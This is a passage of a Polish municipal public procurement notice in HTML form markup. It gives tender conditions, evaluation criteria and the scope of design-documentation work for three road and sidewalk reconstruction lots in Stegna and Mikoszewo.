Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres rękojmi</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający stosowanie do treści art. 144 ust. 1 pkt. 1 ustawy Prawo Zamówień Publicznych przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków jej wprowadzenia:1) Zmiana terminu wykonania umowy określonego w §10 ust.1 pkt. 1 umowy, jeżeli:a)	pomimo wystąpienia przez Wykonawcę z właściwie przygotowanym wnioskiem o wydanie decyzji administracyjnych lub warunków technicznych, lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu umowy, w terminie przewidzianym w odrębnych przepisach organ administracji publicznej lub inna instytucja nie wyda stosownego dokumentu; w takim przypadku termin wykonania przedmiotu umowy zostanie przesunięty o ilość dni zwłoki w wydaniu stosownego dokumentu,b)	wystąpi konieczność uzyskania dodatkowych uzgodnień wydawanych przez organ administracji publicznej lub inną instytucję, w takim przypadku termin wykonania przedmiotu umowy zostanie przesunięty o ilość dni niezbędnych do uzyskania stosownych uzgodnień,c)	Zamawiający z ważnych przyczyn, nie dających się przewidzieć w chwili zawarcia umowy, wstrzyma wykonywanie prac projektowych; w takim przypadku termin wykonania przedmiotu umowy zostanie przesunięty o ilość dni równą okresowi wstrzymania prac,d) Zamawiający zażąda zmian w zaakceptowanej przez siebie dokumentacji projektowej, o ilość dni niezbędnych do wprowadzenia tych zmian 2) wystąpienie zmian powszechnie obowiązujących przepisów prawa podatkowego w zakresie stawki podatku VAT, co skutkować będzie zmianą wynagrodzenia brutto, przy niezmienionym wynagrodzeniu netto.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-10-27</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji projektowo - kosztorysowych na: ,,Przebudowa drogi gminnej ul. Dmowskiego w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji".</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b> ,,Przebudowa drogi gminnej ul. Dmowskiego w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji".1. Zamiar inwestycyjny obejmuje projektowanie w zakresie:1/ Rozbiórki istniejącego utwardzenia z płyt żelbetowych pełnych;2/ Wykonania sieci kanalizacji deszczowej do odprowadzenia wód opadowych z jezdni drogi;3/ Wykonania jezdni drogi, długości ok. 85mb. o nawierzchni z kostki betonowej;4/ Wykonania chodnika przylegającego do jezdni drogi;5/ Wykonania ciągu pieszo jezdnego ok. 200mb. o nawierzchni z kostki betonowej wraz z placami do zawracania samochodów;6/ Wykonania zjazdów indywidualnych na posesje z kostki betonowej;7/ Wykonania drogi pieszej od placu do zawracania k/transformatora w kierunku przystanku kolejki wąskotorowej (do granicy terenu kolejowego);8/ Przebudowy skrzyżowania z drogą wojewódzką nr 501- ul. Gdańską (o ile zadanie to nie zostanie ujęte w projekcie przebudowy DW 501).9/ Ustalenie stałej organizacji ruchu drogowego;10/ Usunięcie potencjalnych kolizji urządzeń liniowych wynikających z uzyskanych warunków technicznych.2. Planowany przebieg inwestycji obejmuje działki w obrębie ewidencyjnym Stegna nr: 612/1, 631 (Gmina Stegna), 892 (Województwo Pomorskie). Ponadto przebieg inwestycji może obejmować inne nowopowstałe działki w wyniku podziałów geodezyjnych.3. Stan faktyczny Projektowany przebieg drogi obejmuje grunty użytkowane jako drogi stanowiące własność Gminy Stegna. Skrzyżowanie z DW 501 (ul. Gdańska) obejmuje również grunty będące własnością Województwa Pomorskiego. Droga posiada na całej długości utwardzenie z płyt drogowych żelbetowych pełnych łącznie ze skrzyżowaniem z DW 501 (ul. Gdańską). Na zakończeniach drogi znajdują się place do zawracania samochodów o nawierzchni z płyt drogowych. Odcinek drogi pieszej od placu do zawracania k/transformatora do przystanku kolejki o nawierzchni gruntowej. W drodze znajdują się urządzenia liniowe nie związane z potrzebami drogowymi. Droga nie posiada odwodnienia. Oświetlenie drogowe zbudowane na słupach energetycznych z zasilaniem linią napowietrzną.4. W ramach przedmiotu zamówienia Wykonawca przedmiotu zamówienia powinien:1/ Opracować mapę do celów projektowych dla terenu przewidzianego zamierzeniem inwestycyjnym;2/ Wykonać pomiary sytuacyjno-wysokościowe oraz inwentaryzację pasa drogowego;3/ Wykonać odwierty geotechniczne według potrzeb; 4/ Uzyskać warunki techniczne do gestorów urządzeń liniowych występujących w drodze: - Energa - Operator SA, - Telekomunikacja Polska SA, - Centralny Wodociąg Żuławski, - Przedsiębiorstwo Komunalne ,,Mierzeja". 5/ Opracować operat wodnoprawny dla kanalizacji deszczowej i uzyskać pozwolenie wodnoprawne (jeżeli jest wymagane);6/ Uzyskać decyzję o środowiskowych uwarunkowaniach zgody na realizacje inwestycji (jeżeli jest wymagana);7/ Opracować projekt budowlano-wykonawczy branży sanitarnej na wykonanie odwodnienia drogi;8/ Opracować projekty budowlane i wykonawcze branży drogowej oraz innych związanych z potencjalnymi kolizjami z urządzeniami obcymi mogącymi wystąpić w pasie drogowym. 9/ Opracować wymagane projekty zgodnie z Miejscowym Planem Zagospodarowania Przestrzennego dla tego terenu (Stegna wschód); 10/ Opracować informacje dot. bezpieczeństwa i ochrony zdrowia (BIOZ).11/ Opracować szczegółowe specyfikacje techniczne dla wykonania i odbioru robót drogowych dla poszczególnych branż;12/ Opracować kosztorysy inwestorskie dla poszczególnych branż;13/ Opracować przedmiary robót oraz kosztorysy ofertowe dla każdej branży;14/ Uzyskać na rzecz Inwestora wszelkie decyzje, opinie i uzgodnienia wymagane na podstawie odrębnych przepisów;15/ Opracować wniosek oraz uzyskać na rzecz Inwestora prawomocną decyzję o pozwoleniu na budowę;16/ Opracować dokumentację i uzyskać zgodę Wojewody na przebudowę skrzyżowania (o ile zadanie to nie zostanie ujęte w projekcie przebudowy DW 501);17/ Dostarczyć do siedziby Zamawiającego kompletną dokumentację do zgłoszenia robót związanych z przebudową drogi gminnej;18/ Opracować i uzgodnić projekt stałej organizacji ruchu; 19/ Dostarczyć przedmiot zamówienia;20/ Pełnić nadzór autorski.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>74232000-4, 74232200-6, 74224000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-04-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji projektowo - kosztorysowych na: ,,Przebudowa drogi ul. Północnej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem potencjalnych kolizji"</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>,,Przebudowa drogi ul. Północnej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem potencjalnych kolizji". 1. Zamiar inwestycyjny obejmuje projektowanie w zakresie:1/ Wykonanie ciągu pieszo-jezdnego ok. 137mb. o nawierzchni z kostki betonowej;2/ Wykonanie zjazdów indywidualnych na posesje z kostki betonowej oraz wyokrąglonego zjazdu z ul. Grunwaldzkiej;3/ Wykonanie odprowadzenia wód opadowych z jezdni drogi;4/ Ustalenie stałej organizacji ruchu drogowego; 5/ Usunięcie potencjalnych kolizji urządzeń liniowych wynikających z uzyskanych warunków technicznych.2. Planowany przebieg inwestycji obejmuje działki w obrębie ewidencyjnym Stegna nr: 16Ponadto przebieg inwestycji może obejmować inne nowopowstałe działki w wyniku podziałów geodezyjnych np. podział dz. nr 27.3. Stan faktyczny Projektowany przebieg drogi obejmuje grunty użytkowane jako drogi (dr) stanowiące własność Gminy Stegna począwszy od zjazdu z ul. Grunwaldzkiej do połączenia z drogą leśną. Przebieg drogi może powodować konieczność ingerencji w grunty obce. Droga nie posiada trwałego utwardzenia. Na całej długości występuje nawierzchnia gruntowa miejscami wzmocniona kruszywami kamiennymi. Zjazd z ul. Grunwaldzkiej z kostki typu trylinka obwarowany krawężnikiem. Droga nie posiada odwodnienia. Oświetlenie drogowe na słupach energetycznych. Linia napowietrzna. Szerokość pasa drogowego w granicach 3,6 do 4m.4. W ramach przedmiotu zamówienia Wykonawca przedmiotu zamówienia powinien:1/ Uzgodnić potrzeby ingerencji w grunty obce oraz dokonać wydzielenia terenu na potrzeby drogowe i zmienić rodzaj użytkowania (dr); 2/ Opracować mapę do celów projektowych dla terenu przewidzianego zamierzeniem inwestycyjnym;3/ Wykonać pomiary sytuacyjno-wysokościowe oraz inwentaryzację pasa drogowego;4/ Wykonać odwierty geotechniczne według potrzeb (minimum 3); 5/ Uzyskać warunki techniczne od gestorów urządzeń liniowych występujących w drodze: - Energa - Operator SA, - Telekomunikacja Polska SA, - Centralny Wodociąg Żuławski, - Przedsiębiorstwo Komunalne ,,Mierzeja". 6/ Opracować operat wodnoprawny dla odwodnienia jezdni i uzyskać pozwolenie wodnoprawne (w przypadku jeżeli jest wymagane);7/ Uzyskać decyzję o środowiskowych uwarunkowaniach zgody na realizacje inwestycji (w przypadku jeżeli jest wymagane);8/ Uzyskać decyzję o ustaleniu lokalizacji inwestycji celu publicznego dla zadania i opracować wymagane projekty zgodnie z ustaloną lokalizacją; 9/ Opracować projekt budowlano-wykonawczy branży drogowej, kanalizacji deszczowej oraz innych związanych z potencjalnymi kolizjami z urządzeniami obcymi mogącymi wystąpić w pasie drogowym. 10/ Opracować informacje dot. bezpieczeństwa i ochrony zdrowia (BIOZ). 11/ Opracować szczegółowe specyfikacje techniczne dla wykonania i odbioru robót drogowych (dla każdej branży w przypadku kolizji);12/ Opracować kosztorysy inwestorskie dla każdej branży;13/ Opracować przedmiary robót oraz kosztorysy ofertowe dla każdej branży;14/ Uzyskać na rzecz Inwestora wszelkie decyzje, opinie i uzgodnienia wymagane na podstawie odrębnych przepisów;15/ Opracować wniosek oraz uzyskać na rzecz Inwestora prawomocną decyzję o pozwoleniu na budowę;16/ Opracować projekt stałej organizacji ruchu; 17/ Dostarczyć do siedziby Zamawiającego przedmiot zamówienia;18/ Pełnić nadzór autorski.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>74232000-4, 74232200-6, 74224000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-05-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji projektowo - kosztorysowych na: ,,Przebudowa drogi wojewódzkiej nr 501 ul. Gdańskiej w Mikoszewie w zakresie budowy chodnika"</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>,,Przebudowa drogi wojewódzkiej nr 501 ul. Gdańskiej w Mikoszewie w zakresie budowy chodnika". 1. Zamiar inwestycyjny obejmuje projektowanie w zakresie:1/ Rozbiórki istniejącego utwardzenia zjazdu w drogę gminną ul. Brzegową;2/ Wykonania chodnika o nawierzchni z kostki betonowej długości łącznej ok. 235mb. od skrzyżowania z ul. Brzegową w kierunku przeprawy promowej;3/ Wykonania zjazdów w drogę gminną ul. Brzegową oraz na wał wiślany o nawierzchni z kostki betonowej i szerokości dostosowanej do potrzeb;4/ Odwodnienie chodnika i jezdni na odcinku przylegającym do chodnika. 2. Planowany przebieg inwestycji obejmuje działki w obrębie ewidencyjnym Stegna nr: 19 (Gmina Stegna), 138/1, 409/2 (Województwo Pomorskie). Ponadto przebieg inwestycji może obejmować inne nowopowstałe działki w wyniku podziałów geodezyjnych.3. Stan faktyczny Projektowany przebieg chodnika obejmuje grunty użytkowane jako droga wojewódzka nr 501 będące własnością Województwa Pomorskiego oraz w niewielkiej części grunt użytkowany jako droga gminna ul. Brzegowa (zjazd) w Mikoszewie. Teren przewidziany pod inwestycję stanowi gruntowe pobocze drogi przylegające bezpośrednio do jezdni o nawierzchni asfaltowej. Odwodnienie jezdni powierzchniowe. Z uwagi na usytuowanie na wale wiślanym i podjazdach do wału występują znaczne różnice wysokościowe.4. W ramach przedmiotu zamówienia Wykonawca przedmiotu zamówienia powinien:1/ Opracować mapę do celów 